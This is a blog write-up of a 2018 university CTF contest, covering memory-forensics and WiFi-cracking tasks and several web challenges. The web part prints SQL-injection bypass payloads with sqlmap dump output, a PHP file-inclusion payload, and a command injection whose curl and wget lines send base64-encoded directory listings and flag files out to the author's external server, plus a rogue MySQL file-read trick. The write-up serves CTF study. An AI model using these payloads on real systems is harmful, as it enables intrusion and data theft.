分类 CTF 下的文章

2018网络安全校赛 电子取证 WP

电子取证

断电的PC

参考我以前写的博客:https://blog.ixuchao.cn/archives/31.html

步骤如下:

root@Archerx:/home/xiaosai# volatility -f RAM.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/xiaosai/RAM.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80003fed070L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff80003feed00L
                KPCR for CPU 1 : 0xfffff880009ee000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2018-10-29 03:08:06 UTC+0000
     Image local date and time : 2018-10-29 11:08:06 +0800
root@Archerx:/home/xiaosai# volatility psscan -f RAM.vmem --profile=Win7SP1x64
Volatility Foundation Volatility Framework 2.6
Offset(P)          Name                PID   PPID PDB                Time created                   Time exited                   
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x000000007e6148b0 dwm.exe            1984    784 0x00000000138cc000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007e629b30 explorer.exe       2012   1960 0x0000000013993000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007e6bdb30 SearchProtocol      284    840 0x000000000e6b9000 2018-10-29 03:06:13 UTC+0000   2018-10-29 03:07:18 UTC+0000  
0x000000007e70d060 notepad.exe        2816   2012 0x0000000008a8b000 2018-10-29 03:07:47 UTC+0000                                 
0x000000007e716b30 wmpnetwk.exe       2900    468 0x0000000007d8e000 2018-10-29 03:07:52 UTC+0000                                 
0x000000007e7a7810 sppsvc.exe         2828    468 0x0000000008802000 2018-10-29 03:07:51 UTC+0000                                 
0x000000007e814b30 svchost.exe        1540    468 0x0000000018c91000 2018-10-29 03:05:51 UTC+0000                                 
0x000000007e92f060 svchost.exe        1576    468 0x0000000018c9b000 2018-10-29 03:05:51 UTC+0000                                 
0x000000007e9e83a0 taskhost.exe       1900    468 0x000000001457b000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007ea11060 svchost.exe         660    468 0x0000000027e15000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea41b30 SearchIndexer.      840    468 0x00000000107a2000 2018-10-29 03:06:11 UTC+0000                                 
0x000000007ea51b30 svchost.exe         752    468 0x00000000217fd000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea6c200 svchost.exe         784    468 0x0000000021544000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea74b30 svchost.exe         812    468 0x0000000020b0c000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007eaa4060 audiodg.exe         896    752 0x0000000020b30000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ead0800 svchost.exe         972    468 0x000000001fe56000 2018-10-29 03:05:49 UTC+0000                                 
0x000000007eafa890 svchost.exe         332    468 0x000000001fd22000 2018-10-29 03:05:49 UTC+0000                                 
0x000000007eb60b30 spoolsv.exe         644    468 0x0000000012980000 2018-10-29 03:05:50 UTC+0000                                 
0x000000007eb6db30 svchost.exe        1072    468 0x000000001cf62000 2018-10-29 03:05:50 UTC+0000                                 
0x000000007eb791d0 svchost.exe        2860    468 0x00000000087c8000 2018-10-29 03:07:51 UTC+0000                                 
0x000000007ecfe060 csrss.exe           380    364 0x0000000023ce5000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007ed0c530 csrss.exe           320    308 0x000000002446a000 2018-10-29 03:05:45 UTC+0000                                 
0x000000007ed64060 winlogon.exe        412    364 0x00000000236ab000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007eda3b30 lsass.exe           476    372 0x0000000022ab1000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007eda68c0 lsm.exe             488    372 0x0000000022d79000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007edf6b30 svchost.exe         584    468 0x0000000021d9a000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007f4d2b30 services.exe        468    372 0x00000000228cf000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007f4de590 WmiPrvSE.exe       3028    584 0x000000007a893000 2018-10-29 03:07:54 UTC+0000                                 
0x000000007f4e2410 smss.exe            248      4 0x000000002a484000 2018-10-29 03:05:43 UTC+0000                                 
0x000000007f4fe060 svchost.exe        1852    468 0x000000000c234000 2018-10-29 03:06:28 UTC+0000                                 
0x000000007ff09b30 System                4      0 0x0000000000187000 2018-10-29 03:05:43 UTC+0000                                 
0x000000007ff12060 wininit.exe         372    308 0x0000000023db0000 2018-10-29 03:05:46 UTC+0000                                 
root@Archerx:/home/xiaosai# volatility psscan -f RAM.vmem --profile=Win7SP1x64 --dump-dir . -p 2816
Volatility Foundation Volatility Framework 2.6
Usage: Volatility - A memory forensics analysis platform.

volatility: error: no such option: --dump-dir
root@Archerx:/home/xiaosai# volatility memdump -p 2816 -f RAM.vmem --profile=Win7SP1x64 --dump-dir . 
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing notepad.exe [  2816] to 2816.dmp
root@Archerx:/home/xiaosai# strings 2816.dmp | grep SDUT
SDUT2018{yOyQ031XGpiHhCA2qUwi0W9FSih4sIeZ}

大雄

查看进程发现有cmd.exe和nc.exe ,dump直接strings就能找到flag

我感觉正常思路应该是查看cmd.exe执行的命令

看到用nc传输了flag.zip文件

提取出flag.zip 发现有密码……目前密码还没找了……

步骤如下:

root@Archerx:/home/xiaosai# strings  3236.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3608 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing nc.exe [  3608] to 3608.dmp
root@Archerx:/home/xiaosai# strings 3608.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3872 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing nc.exe [  3872] to 3872.dmp
root@Archerx:/home/xiaosai# strings 3872.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3708 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing cmd.exe [  3708] to 3708.dmp
root@Archerx:/home/xiaosai# strings 3708.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility cmdscan  -f vmem --profile=Win7SP1x64 
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 2308
CommandHistory: 0x379ca0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x31a350: nc 10.6.65.3 < C:\flag\flag.zipx
Cmd #1 @ 0x350eb0: nc 10.6.65.3 6666 < C:\flag\flag.zipx
Cmd #2 @ 0x350f10: nc 10.6.65.3 6666 < C:\flag\flag.zip
**************************************************
CommandProcess: conhost.exe Pid: 2308
CommandHistory: 0x37ecd0 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0xf4
**************************************************
CommandProcess: conhost.exe Pid: 2408
CommandHistory: 0x2ca9b0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x2c9c00: ping -t 10.6.65.36
Cmd #1 @ 0x2c9c60: ping -t 10.6.65.4
Cmd #2 @ 0x2c9c90: ping -t 10.6.65.220
**************************************************
CommandProcess: conhost.exe Pid: 2408
CommandHistory: 0x2cab90 Application: PING.EXE Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x88
**************************************************
CommandProcess: conhost.exe Pid: 3540
CommandHistory: 0x1da9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3540
CommandHistory: 0x1dab90 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
Cmd #8 @ 0xffb46238: 
Cmd #9 @ 0x1b3340: 
md #23 @ 0x160158: 
Cmd #24 @ 0x1afca0: 
**************************************************
CommandProcess: conhost.exe Pid: 3476
CommandHistory: 0x10a9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3476
CommandHistory: 0x10af30 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
**************************************************
CommandProcess: conhost.exe Pid: 3916
CommandHistory: 0x41a9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3916
CommandHistory: 0x41ab90 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
Cmd #8 @ 0xffb46238: ;
Cmd #9 @ 0x3f3340: ?
Cmd #23 @ 0x3a0158: A
Cmd #24 @ 0x3efca0: ;

提取出flag.zip文件:

root@Archerx:/home/xiaosai# volatility filescan  -f vmem --profile=Win7SP1x64 | grep flag.zip
Volatility Foundation Volatility Framework 2.6
0x000000007e70f9a0      2      0 RW-rw- \Device\HarddiskVolume2\flag\flag.zipx\Desktop\flag.zipx
0x000000007e87f8a0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007e92f9e0      2      0 -W-rwd \Device\HarddiskVolume2\flag\flag.zipn\AppData\Local\Temp\vmware-wangjian\VMwareDnD\873b898e\flag.zip
0x000000007e98dbb0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007e9bddd0      2      0 RW-rw- \Device\HarddiskVolume2\flag\flag.zipx
0x000000007f28b700      2      1 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007fe97ae0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
root@Archerx:/home/xiaosai# ls
2816.dmp  2.png  3236.dmp  3608.dmp  3708.dmp  3872.dmp  black.png  DEEP.zip  file  go1.8.3.linux-amd64.tar.gz  logo.png  output  RAM.vmem  timg.jpg  tp5getshell.py  vmem
root@Archerx:/home/xiaosai# binwalk 3236.dmp | grep zip
root@Archerx:/home/xiaosai# volatility  -f vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007fe97ae0 -n --dump-dir=.
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x7fe97ae0   None   \Device\HarddiskVolume2\flag\flag.zip
SharedCacheMap 0x7fe97ae0   None   \Device\HarddiskVolume2\flag\flag.zip

损坏的图片

在线修复即可

kaka的HDD

Winhex 可以看到空闲分区有一个password

下面有两种做法,winhex进行文件恢复出一个zip,用上面的密码直接解压得到flag。

还可以用binwalk分析出该磁盘文件中有一个zip文件,dd提取出后解压得到flag

恐怖袭击

Codefest 2018 Intercept 原题

题解请参照:https://www.anquanke.com/post/id/158680

偷窥的wifi

WiFi.pcap 里面含有握手包,python生成密码,

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/12/13 下午 06:50

with open('dic.txt','w') as f:
    for q in range(10):
        for w in range(10):
            for e  in range(10):
                for r in range(10):
                    a = 'seclab'+str(q)+str(w)+str(e)+str(r)
                    f.write(a+'\n')

aircrack 破解WiFi密码

root@Archerx:/home/xiaosai# aircrack-ng wifi.cap 
Opening wifi.cap
Read 10678 packets.



      [00:00:00] 1016/9999 keys tested (3016.84 k/s) 

      Time left: 2 seconds                                      10.16%

                          KEY FOUND! [ seclab1012 ]


      Master Key     : 7E F7 C2 F7 15 B8 98 A0 5B 03 22 D7 E5 33 F0 A8 
                       C3 84 B6 8B A6 94 17 6A 0E 12 6B CA 35 05 36 E5 

      Transient Key  : 72 98 AB 10 F2 4E 97 4B 89 83 12 25 79 02 0E EF 
                       63 6F 39 FB 4B 83 06 06 FF 7A 3E 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 08 68 78 A4 75 59 F2 A7 F9 31 CD 7B 66 FB 45 A8 

使用XOR.exe解密KEY.bin,密码为wifi密码
得到HTTP SSL密钥数据

https详解:https://www.jianshu.com/p/e96620cdc2cf

导入wireshark解密ssl流量

导出一个flag.zip的压缩包,里面有一个flag.txt转换成ascii即可。

  • 写完题解整个人都不好了

2018网络安全校赛Web-WP

首先感谢一下出题人,有些题确实很好,嘿嘿。

WEB

黑曜石

修改UA头即可

网站后台

万能密码绕过,没有任何过滤

payload:

uname=1") Or 1 -- -
或者:  uname Or 1 #
密码随便填

也可以用sqlmap跑出来注意设置随机UA头(源码上会判断UA头)

py -2 sqlmap.py --random-agent -u "http://10.6.65.230:1011/index.php" --data="uname=1&passwd=2&submit=%E7%99%BB%E5%BD%95" --level 2

或者是
py -2 sqlmap.py -r C:\Users\徐超\Desktop\sql.txt --random-agent --level=2

直接跑出相应表中flag

E:\ctf工具\tools -cmd\sqlmapproject-sqlmap-1.1.10-33-g9ae713b\sqlmapproject-sqlmap-9ae713b>py -2 sqlmap.py -r C:\Users\徐超\Desktop\sql.txt --random-agent --level=2 -D sdutctf -T users --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.10.9#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:28:33

[22:28:33] [INFO] parsing HTTP request from 'C:\Users\徐超\Desktop\sql.txt'
[22:28:33] [INFO] fetched random HTTP User-Agent header from file 'E:\ctf工具\tools -cmd\sqlmapproject-sqlmap-1.1.10-33-g9ae713b\sqlmapproject-sqlmap-9ae713b\txt\user-agents.txt': 'Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4'
[22:28:33] [INFO] resuming back-end DBMS 'mysql'
[22:28:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1") AND (SELECT * FROM (SELECT(SLEEP(5)))WOIJ) AND ("zmCd"="zmCd&passwd=2&submit=%E7%99%BB%E5%BD%95

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=1") UNION ALL SELECT NULL,CONCAT(0x71627a7671,0x78644b514a6950634376576e465142536279506566575466484565426672616c77675165724b4244,0x71766a6271)-- RQmS&passwd=2&submit=%E7%99%BB%E5%BD%95
---
[22:28:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:28:34] [INFO] fetching columns for table 'users' in database 'sdutctf'
[22:28:34] [INFO] the SQL query used returns 3 entries
[22:28:34] [INFO] retrieved: "id","int(2)"
[22:28:34] [INFO] retrieved: "username","varchar(255)"
[22:28:34] [INFO] retrieved: "password","varchar(255)"
[22:28:34] [INFO] fetching entries for table 'users' in database 'sdutctf'
[22:28:34] [INFO] the SQL query used returns 1 entries
[22:28:34] [INFO] analyzing table dump for possible password hashes
Database: sdutctf
Table: users
[1 entry]
+----+----------+--------------------------------------------+
| id | username | password                                   |
+----+----------+--------------------------------------------+
| 1  | admin    | SDUT2018{079bSyzFTHOk4cK8d30sDOfSbeEiKXUy} |
+----+----------+--------------------------------------------+

[22:28:34] [INFO] table 'sdutctf.users' dumped to CSV file 'C:\Users\徐超\.sqlmap\output\10.6.65.230\dump\sdutctf\users.csv'
[22:28:34] [INFO] fetched data logged to text files under 'C:\Users\徐超\.sqlmap\output\10.6.65.230'

[*] shutting down at 22:28:34

最后放上题目源代码:

<?php

//including the Mysql connect parameters.
include("sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
  $uname=$_POST['uname'];
  $passwd=$_POST['passwd'];

 


  // connectivity
  $uname='"'.$uname.'"';
  $passwd='"'.$passwd.'"'; 
  @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  $result=mysql_query($sql);
  $row = mysql_fetch_array($result);

  if($row)
  {
      echo "<br>";
    echo '<p style="font-size:24pt;color:black;text-align:center">'.GREAT!!!. '<p>';
    echo '<p style="font-size:24pt;color:red;text-align:center">'. $row['password'].'<p>';
    echo "<br>";
    }
  else  
  {
    echo '<font color= "#0000ff" font size="3">';
    echo 'You login error!';
    //print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>"; 
    echo "</font>";  
  }
}

?>

密码是啥

php代码审计

 if (isset ($_GET['passwd'])) {
    
            if (@ereg ("^[a-zA-Z0-9]+$", $_GET['passwd']) === FALSE)
    
                echo '你的密码不正确';
    
            else if (strlen($_GET['passwd']) < 10 && $_GET['passwd'] > 8888888) {
    
                if (@strpos ($_GET['passwd'], '5o7') !== FALSE && @strpos ($_GET['password'], '---') !== FALSE)
    
                    require("flag.txt");
            }
    
    
            else
    
            echo 'Invalid password';
    
            }
        

出题人代码写错了吧……

payload

http://10.6.65.230:1000/index.php?passwd=1e95o7&password=---

flag隐藏了

php伪协议文件包含

payload:

http://10.6.65.230:1001/index.php?page=php://filter/convert.base64-encode/resource=Y45uZmln.php

flag更新时间90秒,手速快一点,多试几次…………

相等?

HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Tue, 11 Dec 2018 19:51:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.25
Hint: username&password
Content-Length: 147

<p>Login first</p><br/><!--1. $name == $password--><br/><!--2. sha1($name) === sha($password)--><br/><!--3. die $flag--><br/><!-- fight ! --><br/>

查看res头有一个提示,很简单

payload:

GET /index.php?username[]=1a&password[]=1 HTTP/1.1
Host: 10.6.65.230:1002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

诡计

计算器

后端关键源代码

<?php
    echo $str." = ".shell_exec("echo \"$str\" | bc");
?>

把要计算的表达式以字符串形式传给bc,并返回计算结果

shell_exec()直接执行shell命令

可以看到没有任何过滤,服务器上nc监听好,尝试bash和nc反弹shell都失败,(出题人说docker限制了nc和bash的shell反弹)

现在只剩下curl、wget、ping 我们挨个尝试

ping

[root@instance-7e0k9b9j /]# ping `ls | base64 -w 0`.dl.ixuchao.cn
ping: YmluCmJvb3QKZGV2CmV0Ywpob21lCmxpYgpsaWI2NApsb3N0K2ZvdW5kCm1lZGlhCm1udApvcHQKcHJvYwpyb290CnJ1bgpzYmluCnNydgpzeXMKdG1wCnVzcgp2YXIK.dl.ixuchao.cn: Name or service not known

后面的域名是我自建的dns服务器,勉强相当于个dnslog吧。

前缀过长,本地测试失败,排除这种方法。

curl

服务器上用python开一个web服务器

python -m SimpleHTTPServer

因为回车符可能会截断输出,所以base64编码后用curl传输

payload

`curl http://106.12.150.166:8000/$(ls -l |base64 -w 0)`
-w 0 全部编码不分片

回显如下:

202.110.209.182 - - [11/Dec/2018 19:03:41] code 404, message File not found
202.110.209.182 - - [11/Dec/2018 19:03:41] "GET /dG90YWwgOAotci1zci1zci10IDEgcm9vdCByb290IDE3MDcgT2N0IDMwIDE0OjU2IGluZGV4LnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgNDIgRGVjIDEyIDAzOjAwIHRnbG5Jd1c2TWVPRmFqNEpHd01vVzhtWno0R2dMSFhsLnR4dAo= HTTP/1.1" 404 -
202.110.209.182 - - [11/Dec/2018 19:05:03] code 404, message File not found
202.110.209.182 - - [11/Dec/2018 19:05:03] "GET /U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 HTTP/1.1" 404 -

解码后:

root@iZj6c1wjgvrqav2931bx62Z:/home# echo dG90YWwgOAotci1zci1zci10IDEgcm9vdCByb290IDE3MDcgT2N0IDMwIDE0OjU2IGluZGV4LnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgNDIgRGVjIDEyIDAzOjAwIHRnbG5Jd1c2TWVPRmFqNEpHd01vVzhtWno0R2dMSFhsLnR4dAo= | base64 -d
total 8
-r-sr-sr-t 1 root root 1707 Oct 30 14:56 index.php
-rw-r--r-- 1 root root   42 Dec 12 03:00 tglnIwW6MeOFaj4JGwMoW8mZz4GgLHXl.txt
root@iZj6c1wjgvrqav2931bx62Z:/home# echo U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 | base64 decode
base64: decode: No such file or directory
root@iZj6c1wjgvrqav2931bx62Z:/home# echo U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 | base64 -d
SDUT2018{QTGIytoHLQOSBrGegUHlGwBs99JOayLv}root@iZj6c1wjgvrqav2931bx62Z:/home# 

wget

wget和上面curl一样,本地监听,payload如下:

`wget http://106.12.150.166:8000/$(ls -l |base64 -w 0)`
  • 写在最后:因为10秒钟一换flag,这里放出一个比较快的方法。
payload:
`curl http://106.12.150.166:80/ -X POST -d $(cat tglnIwW6MeOFaj4JGwMoW8mZz4GgLHXl.txt)`
注: 这里一定要POST传值,GET传值的话包含特殊符号'{'会自动丢弃。

nc监听:

[root@instance-7e0k9b9j ~]# nc -lvlk -p 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:33223.
POST / HTTP/1.1
User-Agent: curl/7.35.0
Host: 106.12.150.166
Accept: */*
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

SDUT2018{6LqX5IkhWLaKx66HnDLDVnJXLAfyrjZC}Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:39808.
POST / HTTP/1.1
User-Agent: curl/7.35.0
Host: 106.12.150.166
Accept: */*
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

拼手速

很简单一个题,考察python爬虫编写能力。

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/12/11 下午 09:08

import requests
import re
from bs4 import BeautifulSoup as bs

url = 'http://10.6.65.230:1005/index.php?'


res = requests.get(url=url)
html = res.text
soup = bs(html,'lxml')
flag = soup.button.string
print(flag)
headers = {
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
   'Accept' : '*/*',
   'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
   'Cookie' : 'session=.eJwdj8FqwzAQBX-l7NkHK7JDMPTQ4lQ4sGsS5ITVzandSrLlQkNpqpB_r9rDXN5hmHeDfghugeqtny9jBm6ASmw2GSwfy-sI1Q0ezlAB-fcfjs2VVCON2rk_KL5Yo1GytzNqG9r6YLGeYnvqBOrDTKGJpMgb30njn0rSFFBRaBVK0lygPwYOLFs9p21forfB-KNlnzyr7crU-4IjX43qoglN3uqpoHqYyE_f5t-zcxifHUfj8LSVqaVkzY9wz-DrMn4ufUgHQKyFyMt8nYD7L3n3TQ4.DvG99A.X83b73vdue76lkT5DbcAaWXqN_k',
}


data = {
    'key':flag,
    'nonce':'682c214b7dbbdbb71ae37b8e18f84a0939e514e6b34ccf57f0953f0cf8c756825fbf799f8d928ff5ab4a3a6d48c61de3fb499847d690dcf8bb30bc6b1a7e39a6'
}


url1 = 'http://10.6.65.222/chal/22'
res = requests.post(url=url1,headers=headers,data=data)
print(res.text)

小蜘蛛

典型考察SSRF

右键源代码看到提示访问一下:

http://10.6.65.230:1006/admin/index.php

提示你不是公司员工,这道题类似的想到SSRF

还有在爬去自身http://localhost/admin/index.php时会提示网站标题 : 403 -- 请使用公司内部计算机名访问都会指向似乎是一个类似SSRF

爬取http://localhost/admin/index.php会显示MMP……

服务器nc监听一下80端口,使用网页爬虫去访问一下获取结果XFF头可以看到docker名为f954b1cb4035,宿主机是 10.6.65.230为dockers上一级代理

[root@instance-7e0k9b9j ~]# nc -lvkp 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:64954.
GET / HTTP/1.0
Host: 106.12.150.166
X-Forwarded-For: f954b1cb4035, 10.6.65.230

直接用爬虫去爬取docker中的页面http://f954b1cb4035/admin/index.php找到flag

最后放上题目源码:

<!DOCTYPE html>
<html>
<head>
<?php
header('Content-Type:text/html; charset= utf-8');

function exceptions_error_handler($severity, $message, $filename, $lineno) {
    throw new ErrorException($message, 0, $severity, $filename, $lineno);
}
set_error_handler('exceptions_error_handler');
session_start();
$_SESSION['flag'] = '0';
include('include/extractTitleLogic.php');
if (isset($_POST['url'])){
    try {
        $dumpurl = parse_url($_POST['url']);
        $httpurl = "";
        if( !empty($dumpurl['scheme']) && !empty($dumpurl['host']) && ($dumpurl['scheme'] == 'http' || $dumpurl['scheme'] == 'https'))
        {
            if($dumpurl['host'] == '127.0.0.1')
                die('Kaka Say : MMP...');
            if( !empty($dumpurl['path']) && $dumpurl['path'] != '')
                $httpurl = ''.$dumpurl['scheme'].'://'.$dumpurl['host'].$dumpurl['path'];
            else
                $httpurl = ''.$dumpurl['scheme'].'://'.$dumpurl['host'].'/';
        }
        else{
            die('Kaka Say : MMP...');
        }
        $hdrs = array(
            'http' =>array('header' => "X-Forwarded-For: ".gethostname().", 10.6.65.230\r\n",
            "timeout"=>5,                             
            ),
        );
        $context = stream_context_create($hdrs);
        $cnt=0;   
        while($cnt<10 && ($content = file_get_contents($httpurl,false,$context))===FALSE) $cnt++;   
        $title =    get_title($content);    
    } catch (Exception $e) {
           echo "<center>抓取异常: " . $httpurl . "</center>";    
           exit();
}
    
}

?>

</head>
<body>
<center>
    <h1>Title 网页爬虫</h1>
    <form action='' method='POST'>
        <input placeholder='URL' name='url'>
        <input type='submit' value='获取网站Title'>
    </form>
 </br>
  <br>
<b>
             <?php
             if (isset($title)) {
                 echo is_array($title) ? '' : '网站标题 : '.htmlspecialchars($title, ENT_QUOTES).'</br></br>';    
             }else{
                 
                 if (isset($_SESSION['flag']) and $_SESSION['flag'] =='1') {
                     echo '没有Title标签,网页如下';
                 ?>
                         <br>
                        <br><br>
                         <div style="width: 691px; height: 464px;">
                             <?php //print htmlspecialchars($content, ENT_QUOTES); 
                                 print $content;    
                             ?>
                         </div><br><br>
                         <?php
                         
                     }    
             }
     ?>
 </b>
 <!-- /admin/index.php -->
</center>
</body>
</html>

爆破小工具

考察的很新颖,给出题人一个大大的赞。

考察点:LOAD DATA LOCAL INFILE功能来读取客户端文件。

具体参考:https://www.anquanke.com/post/id/106488

github地址:https://github.com/bettercap/bettercap

res 返回头中给出了flag的绝对路径Flag: /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt

使用kali下bettercap(apt install bettercap)搭建一个简易的mysql服务器,在客户端尝试链接该服务器时读取客户端的任意文件。

payload:

root@Archerx:~# bettercap -eval "set mysql.server.infile /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt; mysql.server on"
bettercap v2.11 (type 'help' for a list of commands)

10.6.65.0/24 > 10.6.65.44  » [19:56:10] [sys.log] [inf] [mysql.server] read file ( /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt ) is 41 bytes
10.6.65.0/24 > 10.6.65.44  » [19:56:10] [sys.log] [inf] 
SDUT2018{xSbXZdPV0LQDAeAwnAXD59U8lGpYnLaw}

右键源代码如下:


        $text = $_GET["text"];  
        $file = $_GET["file"];  
        $result = $_GET["answer"];  
    
        if(isset($text)&&(file_get_contents($text,\'r\')==="The first step")){  
            echo "hello admin!<br>";  
        include($file); //try to get all the code of tishi.php 
        }else{  
            echo "you are not admin ! ";  
        }  

        didi: __tostring() 
                
        -->

kaka的php

考察:

  • php伪协议
  • php反序列化

